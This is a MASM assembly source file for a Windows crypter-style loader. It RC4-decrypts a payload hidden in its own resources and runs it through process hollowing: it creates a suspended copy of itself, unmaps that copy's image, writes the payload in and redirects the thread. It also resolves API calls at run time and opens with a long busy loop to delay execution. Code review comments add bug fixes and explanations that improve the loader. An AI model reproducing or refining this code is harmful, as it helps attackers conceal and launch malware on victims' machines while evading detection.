;Compiled with MASM (MASM32 SDK). 32-bit flat model, stdcall, Intel syntax.
;Globals used below (rc4keytable, mPath, hInstance, temp, find1..find4, password,
;ResInf, hResourceSize, loop_stopper) are not declared in this file - presumably
;they come from 123.inc, which is not shown here.
  2. .386
  3. .model flat, stdcall
  4. option casemap:none
  5. include \masm32\include\windows.inc
  6. include \masm32\include\kernel32.inc
  7. include \masm32\include\shell32.inc
  8. include \masm32\include\ntdll.inc
  9. include 123.inc
  10. includelib \masm32\lib\kernel32.lib
  11. includelib \masm32\lib\shell32.lib
  12. includelib \masm32\lib\ntdll.lib
  13. .code
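  ;-----------------------------------------------------------------------
  ; Rc4_setkey(Pass, LenPass)
  ; RC4 key schedule (KSA): fills the 256-byte global rc4keytable with the
  ; identity permutation and mixes it with the LenPass key bytes at Pass.
  ; Must be called before Rc4_crypt. No return value; all registers are
  ; preserved (pushad/popad). Only rc4keytable is modified.
  ; Fixes vs. original:
  ;  - LenPass == 0 used to read 256 bytes past the (empty) key buffer. It
  ;    now leaves the identity permutation in place and touches no key
  ;    bytes; callers should still reject an empty password themselves.
  ;  - the key index was kept in bl, so keys longer than 256 bytes wrapped
  ;    to key[k mod 256]; it is now the full ebx. Identical for shorter keys.
  ; Caveat: RC4 is a broken cipher (keystream biases, no integrity); this is
  ; obfuscation-grade protection for the embedded payload, nothing more.
  ;-----------------------------------------------------------------------
  Rc4_setkey proc Pass:DWORD, LenPass:DWORD
      pushad
      ; S[i] = i, written four bytes at a time from the top of the table down:
      ; 0FFFEFDFCh lands as FC FD FE FF at offsets 252..255, then minus
      ; 04040404h per dword until 00 01 02 03 is stored at offset 0.
      mov eax, 0FFFEFDFCh
      mov ecx, 256/4
  Init_rc4keytable:
      mov dword ptr [rc4keytable+4*ecx-4], eax
      sub eax, 04040404h
      dec ecx
      jnz Init_rc4keytable           ; leaves ecx = 0, reused as i below

      mov esi, LenPass
      test esi, esi
      jz Key_done                    ; empty key: do not read past the buffer

      xor eax, eax                   ; j = 0 (kept in al; eax stays < 256)
      mov edi, Pass
  Key_return:
      xor ebx, ebx                   ; k = 0, index into the key
      mov esi, LenPass               ; key bytes left before k wraps to 0
      jmp New_key
  Key_loop:
      inc ebx                        ; k += 1 (full register: no wrap at 256)
      dec esi
      jz Key_return                  ; consumed the whole key, start over
  New_key:
      mov dl, byte ptr [rc4keytable+ecx]    ; dl = S[i]
      add al, byte ptr [edi+ebx]            ; j += key[k]
      add al, dl                            ; j += S[i]   (mod 256)
      mov dh, byte ptr [rc4keytable+eax]    ; swap S[i] <-> S[j]
      mov byte ptr [rc4keytable+ecx], dh
      mov byte ptr [rc4keytable+eax], dl
      inc cl                                ; i += 1; ZF set when i wraps past 255
      jnz Key_loop
  Key_done:
      popad
      ret
  Rc4_setkey endp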
  50.  
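  ;-----------------------------------------------------------------------
  ; Rc4_crypt(iData, LenData)
  ; RC4 keystream (PRGA) XORed over LenData bytes at iData, in place - the
  ; same call encrypts and decrypts. Requires Rc4_setkey first. The buffer
  ; at iData must be writable. All registers preserved (pushad/popad).
  ; One-shot: i and j start at 0 on every call and the key table is zeroed
  ; (rep stosd) before returning, so a second call needs Rc4_setkey again.
  ; Fix vs. original: LenData == 0 skipped the wipe and left the expanded
  ; key in memory; the table is now scrubbed on that path too.
  ; Caveat: there is no integrity check - a wrong key silently produces
  ; garbage that the caller cannot distinguish from a valid payload.
  ;-----------------------------------------------------------------------
  Rc4_crypt proc iData:DWORD, LenData:DWORD
      pushad
      mov edi, LenData               ; bytes remaining
      mov esi, iData                 ; current byte
      xor eax, eax                   ; j (kept in al; eax stays < 256 for indexing)
      xor edx, edx
      xor ecx, ecx
      xor ebx, ebx                   ; i (kept in bl; ebx stays < 256)
      test edi, edi
      jz Rc4_wipe                    ; nothing to transform, still scrub the table
  Rc4_enc_loop:
      inc bl                                ; i = (i + 1) mod 256
      mov dl, byte ptr [rc4keytable+ebx]    ; dl = S[i]
      add al, dl                            ; j = (j + S[i]) mod 256
      mov cl, byte ptr [rc4keytable+eax]    ; cl = S[j]
      mov byte ptr [rc4keytable+ebx], cl    ; swap S[i] <-> S[j]
      mov byte ptr [rc4keytable+eax], dl
      add cl, dl                            ; cl = (S[i] + S[j]) mod 256 after the swap
      mov cl, byte ptr [rc4keytable+ecx]    ; keystream byte K = S[cl]
      xor byte ptr [esi], cl
      inc esi
      dec edi
      jnz Rc4_enc_loop
  Rc4_wipe:
      xor eax, eax                   ; zero the 256-byte S-box so the key
      mov edi, offset rc4keytable    ; schedule does not linger in memory
      mov ecx, 256/4
      cld
      rep stosd
      popad
      ret
  Rc4_crypt endp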
  87.  
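  ;-----------------------------------------------------------------------
  ; getadress(module, funcion) -> eax = ebx = GetProcAddress(LoadLibrary(module), funcion)
  ; Resolves an export at run time instead of importing it statically. The
  ; address is returned in BOTH eax and ebx because callers in this file
  ; read either one (ebx at the first use in ExtractFile, eax later). Note
  ; this clobbers ebx, which stdcall treats as callee-saved.
  ; Fix vs. original: when LoadLibrary fails the original still called
  ; GetProcAddress with a NULL module; it now returns 0 straight away.
  ; Callers must still check for 0 before `call temp`.
  ; The library handle is never released (FreeLibrary was commented out in
  ; the original), so every call bumps the module's reference count.
  ; NOTE(review): if `module` is a bare DLL name the usual DLL search-order
  ; caveats apply; a full path or LoadLibraryEx with a search flag is safer.
  ;-----------------------------------------------------------------------
  getadress proc module:DWORD,funcion:DWORD
  LOCAL fh:HMODULE
      push module
      call LoadLibrary
      mov fh,eax
      test eax,eax
      jz @F                          ; LoadLibrary failed: eax is already 0
      push funcion
      push fh
      call GetProcAddress            ; 0 if the export is missing
  @@:
      mov ebx,eax
      ret
  getadress endp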
  ;-----------------------------------------------------------------------
  ; ExtractFile
  ; Pulls RCDATA resource 1212 out of this module, RC4-decrypts it in place
  ; with `password`, starts a suspended second copy of this executable
  ; (mPath), unmaps that copy's image, writes the decrypted PE at its
  ; preferred ImageBase and resumes the main thread at the payload's entry
  ; point - the sequence commonly called process hollowing.
  ; No return value. A missing resource ends the process via ExitProcess;
  ; a zero-size or unloadable resource falls out of the .if chain silently.
  ; Globals read/written (declared elsewhere, presumably 123.inc): mPath,
  ; hInstance, temp, find1..find4, password, ResInf, hResourceSize.
  ; NOTE(review): almost no API result is checked - see the inline notes.
  ;-----------------------------------------------------------------------
  ExtractFile proc
  local hResource:dword
  LOCAL sinfo: STARTUPINFO
  LOCAL pinfo: PROCESS_INFORMATION
  LOCAL base: dword
  LOCAL sec: ptr IMAGE_SECTION_HEADER
  LOCAL cnt: CONTEXT

      ; mPath = full path of this executable; 256 is below MAX_PATH (260),
      ; so a longer path is truncated (mPath's real size is declared elsewhere).
      push 256
      push offset mPath
      push 0
      call GetModuleFileName

      push 0
      call GetModuleHandle
      mov hInstance, eax             ; base of this module, used for the resource lookups

      ; Resolve export find2 from module find1 at run time. The result is read
      ; from ebx here (getadress returns it in both eax and ebx).
      invoke getadress,addr find1,addr find2

      mov temp,ebx
      ; call temp(hInstance, 1212, RT_RCDATA) - argument order matches
      ; FindResource(hModule, lpName, lpType); presumably that is what find2 names.
      ; NOTE(review): temp is called even if getadress returned 0.
      push RT_RCDATA
      push 1212
      push hInstance
      call temp

  .if eax == 0
      invoke ExitProcess,0           ; resource not found: nothing to do
  .else
      mov hResource, eax

  ;invoke SizeofResource, hInstance, hResource

      push hResource
      push hInstance
      call SizeofResource
  .if eax != 0

      mov hResourceSize, eax         ; size of the encrypted payload in bytes

  ;invoke LoadResource, hInstance, hResource

      push hResource
      push hInstance
      call LoadResource

  ; invoke getadress,find1,find8
  ;mov temp,ebx
  ;push hResource
  ;push hInstance
  ;call temp

  .if eax != 0
      invoke LockResource, eax
      mov ResInf , eax               ; pointer to the resource bytes inside this module's image
      ; Key = the C string `password`; an empty string gives LenPass = 0.
      invoke lstrlen,addr password
      invoke Rc4_setkey,addr password,eax
      ; Decrypt IN PLACE, through the pointer LockResource returned. That
      ; memory is part of this module's mapped image (.rsrc); the XOR only
      ; works if those pages are writable - verify the section flags, or
      ; copy the resource to a heap/VirtualAlloc buffer first.
      invoke Rc4_crypt,ResInf,hResourceSize
      ; NOTE(review): sinfo.cb is never set to sizeof STARTUPINFO, which
      ; CreateProcess documents as required.
      invoke RtlZeroMemory, addr sinfo, sizeof STARTUPINFO

  ;invoke CreateProcess, offset mPath, 0, 0, 0, 0, CREATE_SUSPENDED, 0, 0, addr sinfo, addr pinfo

      ; Dead resolution: temp is overwritten and never called here - the
      ; direct CreateProcess import is used instead. Note the arguments are
      ; passed without `addr`, unlike the other two getadress calls; if
      ; find1/find4 are byte strings this passes their first bytes, not
      ; their addresses - check against their declarations.
      invoke getadress,find1,find4
      mov temp,eax
      ; CreateProcess(mPath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED,
      ;               NULL, NULL, &sinfo, &pinfo)
      ; NOTE(review): the return value is ignored; pinfo is used below
      ; even if process creation failed.
      lea edx,pinfo
      push edx
      lea edx,sinfo
      push edx
      push 0
      push 0
      push CREATE_SUSPENDED
      push 0
      push 0
      push 0
      push 0
      push offset mPath
      call CreateProcess

      ; Fetch the suspended main thread's integer registers; eax is
      ; overwritten later with the new entry point. Result unchecked.
      invoke RtlZeroMemory, addr cnt, sizeof CONTEXT
      mov cnt.ContextFlags, CONTEXT_INTEGER

      invoke GetThreadContext, pinfo.hThread, addr cnt

  ; invoke GetModuleHandle, 0
      push 0
      call GetModuleHandle

  ; invoke ZwUnmapViewOfSection, pinfo.hProcess, eax

      ; Unmap, in the child, the address at which THIS process's image is
      ; loaded. That only matches the child's image base if the same
      ; executable is mapped at the same address in both processes - an
      ; assumption to confirm, not a guarantee. NTSTATUS in eax is ignored.
      push eax
      push pinfo.hProcess
      call ZwUnmapViewOfSection

      ; edi = decrypted payload's IMAGE_NT_HEADERS via e_lfanew. Neither the
      ; MZ nor the PE signature is checked, so with a wrong password these
      ; offsets are taken from garbage and the copies below read wherever
      ; they point.
      mov edi, ResInf
      add edi, IMAGE_DOS_HEADER.e_lfanew[edi]
      assume edi: ptr IMAGE_NT_HEADERS

      ; Reserve the payload's preferred ImageBase in the child as RWX. No
      ; relocations are applied, so the payload must load at that base; a
      ; NULL return (base already in use) is not checked and base = 0 is
      ; then used as the write target.
      invoke VirtualAllocEx, pinfo.hProcess, [edi].OptionalHeader.ImageBase, [edi].OptionalHeader.SizeOfImage, MEM_COMMIT + MEM_RESERVE, PAGE_EXECUTE_READWRITE

      mov base, eax
  ;invoke WriteProcessMemory, pinfo.hProcess, base, ResInf , [edi].OptionalHeader.SizeOfHeaders, 0

      ; temp(hProcess, base, ResInf, SizeOfHeaders, 0) - same shape as
      ; WriteProcessMemory; this time the result is read from eax.
      ; Copies the PE headers; return value unchecked.
      invoke getadress,addr find1,addr find3
      mov temp,eax
      push 0
      push [edi].OptionalHeader.SizeOfHeaders
      push ResInf
      push base
      push pinfo.hProcess
      call temp

      ; sec = first IMAGE_SECTION_HEADER (OptionalHeader + SizeOfOptionalHeader)
      lea eax, [edi].OptionalHeader
      mov sec, eax
      movzx eax, [edi].FileHeader.SizeOfOptionalHeader
      add sec, eax
      xor eax, eax
      xor esi, esi                   ; section index (compared as 16-bit si)
      xor ecx, ecx
  .while ( si < [edi].FileHeader.NumberOfSections )
      imul eax, esi, sizeof IMAGE_SECTION_HEADER
      add eax, sec                   ; eax = &section[esi]
      mov ebx, base
      add ebx, IMAGE_SECTION_HEADER.VirtualAddress[eax]      ; destination in child
      mov edx, ResInf
      add edx, IMAGE_SECTION_HEADER.PointerToRawData[eax]    ; source in decrypted payload

      ; Copy SizeOfRawData bytes. PointerToRawData/SizeOfRawData are never
      ; bounded against hResourceSize, and the result is unchecked.
      invoke WriteProcessMemory, pinfo.hProcess, ebx, edx, IMAGE_SECTION_HEADER.SizeOfRawData[eax],0

      inc esi
  .endw
      ; New thread eax = base + AddressOfEntryPoint; with the other
      ; registers left as captured, the resumed thread starts the payload.
      ; pinfo.hProcess / pinfo.hThread are never closed.
      mov eax, base
      add eax, [edi].OptionalHeader.AddressOfEntryPoint
      mov cnt.regEax, eax
      invoke SetThreadContext, pinfo.hThread, addr cnt
      invoke ResumeThread, pinfo.hThread
      ret
  .endif
  .endif
  .endif
  ExtractFile endp
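  ;-----------------------------------------------------------------------
  ; _entrypoint
  ; Spins loop_stopper (500,000,000) times doing no useful work, then runs
  ; ExtractFile and exits. The busy loop only burns time before the loader
  ; runs; the mov/push/pop of eax inside it is filler with no observable
  ; effect on the result.
  ; Fix vs. original: the `cmp loop_stopper,0` before the decrement was
  ; dead - `dec` rewrites every flag `jg` looks at (ZF, SF, OF), so the
  ; loop has always been governed by the decrement's result alone. The
  ; misleading compare is dropped; the iteration count is unchanged.
  ;-----------------------------------------------------------------------
  _entrypoint:
      mov loop_stopper,500000000
  loop_start:
      mov eax,0
      push eax
      pop eax
      dec loop_stopper               ; falls through once the counter hits 0
      jg loop_start
      invoke ExtractFile
      invoke ExitProcess, 0
  end _entrypoint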